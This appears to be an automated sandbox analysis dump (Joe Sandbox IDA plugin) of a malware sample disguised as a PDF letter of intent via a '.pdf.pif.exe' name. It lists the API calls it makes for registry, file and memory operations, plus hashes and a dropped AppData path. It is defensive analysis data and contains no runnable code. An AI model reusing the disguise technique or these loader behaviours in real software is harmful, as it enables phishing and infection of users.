                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree
                                                                                      • String ID: Call
                                                                                      • API String ID: 3394109436-1824292864
                                                                                      • Opcode ID: dd03939840fb0e761b64650d6e69ae6f6d30e0bc565fec157a8d19055049d097
                                                                                      • Instruction ID: a46614000ffff33521666511047a5805fbdd1416f0f2d384ace6ef46eaf983fa
                                                                                      • Opcode Fuzzy Hash: dd03939840fb0e761b64650d6e69ae6f6d30e0bc565fec157a8d19055049d097
                                                                                      • Instruction Fuzzy Hash: 6E21A172600501EBC710ABA4DEC8D5E77B4AF4A314B24423BF111B72D0E678D841CF2D
                                                                                      APIs
                                                                                        • Part of subcall function 00406089: FindFirstFileW.KERNELBASE(?,00430248,0042FA00,004058FF,0042FA00,0042FA00,00000000,0042FA00,0042FA00,?,?,74DF3420,004055F5,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00406094
                                                                                        • Part of subcall function 00406089: FindClose.KERNEL32(00000000), ref: 004060A0
                                                                                      • lstrlenW.KERNEL32 ref: 004021DE
                                                                                      • lstrlenW.KERNEL32(00000000), ref: 004021E9
                                                                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402212
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                      • String ID:
                                                                                      • API String ID: 1486964399-0
                                                                                      • Opcode ID: 6ecf75d0669a7ffa43f9291367428dcaf6cc2bdfc10e890a830a0b79b6e23dd5
                                                                                      • Instruction ID: a1e4541ea748a37230a98fe3f03b8279639291f6b9c525da1ef6ae8ee7bc0922
                                                                                      • Opcode Fuzzy Hash: 6ecf75d0669a7ffa43f9291367428dcaf6cc2bdfc10e890a830a0b79b6e23dd5
                                                                                      • Instruction Fuzzy Hash: 1F117371A1031596CB10EFE9CA0969EB6F8EF04344F10443BA505F71D1D6B899419B5C
                                                                                      APIs
                                                                                        • Part of subcall function 00402BDA: RegOpenKeyExW.KERNELBASE(00000000,0000015B,00000000,00000022,00000000,?,?), ref: 00402C02
                                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402481
                                                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402494
                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Enum$CloseOpenValue
                                                                                      • String ID:
                                                                                      • API String ID: 167947723-0
                                                                                      • Opcode ID: c1da2739d9bde231cef35e57f1056c3b3f96b3bdf48c6ea5f9f3b0e529793344
                                                                                      • Instruction ID: 36971e80199c06dce7e432dda95045a67facb8c1c5e5d406bd4c985fc58d1439
                                                                                      • Opcode Fuzzy Hash: c1da2739d9bde231cef35e57f1056c3b3f96b3bdf48c6ea5f9f3b0e529793344
                                                                                      • Instruction Fuzzy Hash: 3DF08171A00205EBEB119FA5DE88ABF766CEF40355F10443EF145A61C0D6B85D419B29
                                                                                      APIs
                                                                                        • Part of subcall function 00402BDA: RegOpenKeyExW.KERNELBASE(00000000,0000015B,00000000,00000022,00000000,?,?), ref: 00402C02
                                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3677997916-0
                                                                                      • Opcode ID: d25861fa117c27e6175a63c96e216350e97318d5e46bf3bab3a62b1bde6aa777
                                                                                      • Instruction ID: a158a5aacad5cf38e27217d247968545a00c68d90011b7c89b18f36f64d1e3ee
                                                                                      • Opcode Fuzzy Hash: d25861fa117c27e6175a63c96e216350e97318d5e46bf3bab3a62b1bde6aa777
                                                                                      • Instruction Fuzzy Hash: 4011A371910205EFDB10CFA0D6585AE77B4EF44355F20843FE042A72C0D6B84A85DB1A
                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                                                      • Instruction ID: adb52dfa00387397cd87161f5118bdb5a91708942fcdcec178a456792abf2482
                                                                                      • Opcode Fuzzy Hash: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                                                      • Instruction Fuzzy Hash: 5101F4316202209BE7095B389D09B6A76D8E711719F10863FF851F72F1D6B8CC429B4C
                                                                                      APIs
                                                                                        • Part of subcall function 00402BDA: RegOpenKeyExW.KERNELBASE(00000000,0000015B,00000000,00000022,00000000,?,?), ref: 00402C02
                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004022FB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseDeleteOpenValue
                                                                                      • String ID:
                                                                                      • API String ID: 849931509-0
                                                                                      APIs
                                                                                      • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnableShow
                                                                                      • String ID:
                                                                                      • API String ID: 1136574915-0
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCreate
                                                                                      • String ID:
                                                                                      • API String ID: 415043291-0
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 100028D3
                                                                                      • GetLastError.KERNEL32 ref: 100029DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1962777342.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                       • Associated: 00000000.00000002.1962748581.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                                       • Associated: 00000000.00000002.1962799990.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                                                       • Associated: 00000000.00000002.1962840643.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocErrorLastVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 497505419-0
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004026A9
                                                                                        • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointerwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 327478801-0
                                                                                      APIs
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402288
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringWrite
                                                                                      • String ID:
                                                                                      • API String ID: 390214022-0
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F8B,000000FF,00000004,00000000,00000000,00000000), ref: 00403177
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,0000015B,00000000,00000022,00000000,?,?), ref: 00402C02
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 10002757
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1962777342.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      APIs
                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileString
                                                                                      • String ID:
                                                                                      • API String ID: 1096422788-0
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000028,?,00000001,00403DF6), ref: 00403FD8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC6,?,?,?,?,00000000,004033FE,?), ref: 004031A0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403D8F), ref: 00403FC1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 0040498E
                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404999
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 004049E3
                                                                                      • LoadBitmapW.USER32(0000006E), ref: 004049F6
                                                                                      • SetWindowLongW.USER32(?,000000FC,00404F6E), ref: 00404A0F
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A23
                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A35
                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404A4B
                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A57
                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A69
                                                                                      • DeleteObject.GDI32(00000000), ref: 00404A6C
                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404A97
                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AA3
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B39
                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404B64
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B78
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404BA7
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BB5
                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404BC6
                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CC3
                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D81
                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404D96
                                                                                      • GlobalFree.KERNEL32(?), ref: 00404DA6
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1F
                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00404EC8
                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED7
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF7
                                                                                      • ShowWindow.USER32(?,00000000), ref: 00404F45
                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404F50
                                                                                      • ShowWindow.USER32(00000000), ref: 00404F57
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                      • String ID: $M$N
                                                                                      • API String ID: 1638840714-813528018
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 0040447F
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004044A9
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040455A
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404565
                                                                                      • lstrcmpiW.KERNEL32(Call,0042D1F8,00000000,?,?), ref: 00404597
                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 004045A3
                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004045B5
                                                                                        • Part of subcall function 0040550D: GetDlgItemTextW.USER32(?,?,00000400,004045EC), ref: 00405520
                                                                                        • Part of subcall function 00405FDA: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 0040603D
                                                                                        • Part of subcall function 00405FDA: CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                                                        • Part of subcall function 00405FDA: CharNextW.USER32(?,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406051
                                                                                        • Part of subcall function 00405FDA: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406064
                                                                                      • GetDiskFreeSpaceW.KERNEL32(0042B1C8,?,?,0000040F,?,0042B1C8,0042B1C8,?,00000000,0042B1C8,?,?,000003FB,?), ref: 00404676
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404691
                                                                                      • SetDlgItemTextW.USER32(00000000,00000400,0042B1B8), ref: 00404717
                                                                                       Memory Dump Source
                                                                                       • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                      • String ID: $@d$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright$Call
                                                                                      • API String ID: 2246997448-2460974281
                                                                                      • Opcode ID: d261c670d50ba5bee67266af79b7bfed0b56d12dbf2e2e6faf1bb8e2e83b33c7
                                                                                      • Instruction ID: bd47b41a7abdf1344e554ed8777e7d92ff40a9b1da15b07d15b44e24a67a1b52
                                                                                      • Opcode Fuzzy Hash: d261c670d50ba5bee67266af79b7bfed0b56d12dbf2e2e6faf1bb8e2e83b33c7
                                                                                      • Instruction Fuzzy Hash: 4E9183B1900209ABDB11AFA1CD85AAF77B8EF85314F10843BF601B72D1D77C8A41CB69
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402715
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: f1f402ef0e705e307558f261dfe267dd3502fab154966cf0cee0880d27ec8a01
                                                                                      • Instruction ID: 7be6c913c08d15ea884a43ce55a76abbcb29d6a56581a49c1298855279991998
                                                                                      • Opcode Fuzzy Hash: f1f402ef0e705e307558f261dfe267dd3502fab154966cf0cee0880d27ec8a01
                                                                                      • Instruction Fuzzy Hash: 19F05E75A001159BDB00EBA4DA499AEB378EF05324F60417BE516E31D1DBB44A41DB29
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                                                      • Instruction ID: 531fec7b0fb0d211cf15be9fd3757e070872b4d27e2d3c8a48bb83720311cc85
                                                                                      • Opcode Fuzzy Hash: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                                                      • Instruction Fuzzy Hash: 01E19A71900705DFCB24CF98C890BAAB7F5FB44305F15882EE897A7291D778AAA1CF44
                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004041D0
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004041E4
                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404201
                                                                                      • GetSysColor.USER32(?), ref: 00404212
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404220
                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040422E
                                                                                      • lstrlenW.KERNEL32(?), ref: 00404233
